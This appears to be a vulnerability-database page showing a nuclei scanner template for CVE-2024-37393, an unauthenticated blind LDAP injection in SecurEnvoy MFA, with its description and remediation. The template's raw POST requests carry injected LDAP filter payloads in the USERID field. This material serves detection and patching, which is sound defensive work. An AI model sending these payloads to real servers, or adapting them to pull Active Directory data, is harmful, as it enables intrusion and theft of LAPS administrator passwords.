Lucene search
K

SecurEnvoy Two Factor Authentication - LDAP Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 79 Views

SecurEnvoy LDAP Injection vulnerabilty, unauth remote attacker could exfiltrate data from Active Directory incl. LAPS cleartext passwor

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cleartext Transmission of Sensitive Information in Securenvoy Multi-Factor_Authentication_Solutions
10 Jun 202412:42
githubexploit
Circl
CVE-2024-37393
10 Jun 202412:48
circl
CNNVD
SecurEnvoy MFA Security Vulnerability
10 Jun 202400:00
cnnvd
CVE
CVE-2024-37393
10 Jun 202400:00
cve
Cvelist
CVE-2024-37393
10 Jun 202400:00
cvelist
NVD
CVE-2024-37393
10 Jun 202420:15
nvd
OSV
CVE-2024-37393
10 Jun 202420:15
osv
Positive Technologies
PT-2024-27519 · Securenvoy · Securenvoy Mfa
10 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-37393
23 May 202508:45
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-37393
12 Nov 202500:00
vulncheck_kev
Rows per page
id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: s4e-io
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  impact: |
    Unauthenticated attackers can exploit LDAP injection to exfiltrate sensitive Active Directory data including cleartext LAPS passwords.
  remediation: |
    Update SecurEnvoy MFA to version 9.4.514 or later.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  classification:
    cve-id: CVE-2024-37393
    cwe-id: CWE-89
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.03304
    epss-percentile: 0.87045
    cpe: cpe:2.3:a:securenvoy:multi-factor_authentication_solutions:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap,vuln,vkev

variables:
  userid: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /secserver/? HTTP/1.1
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users

      - |
        POST /secserver/? HTTP/1.1
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 490a00463044022041975b2f8f9fe8e4d2559cd7f08684fbbc2c19a2c44431a536cd45d7b0fdd42d0220700bfde6538b10ff0e173739f32b12e9e16de1231205692acb9da627fb54e9ec:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5 - 9.8
EPSS0.03304
SSVC
79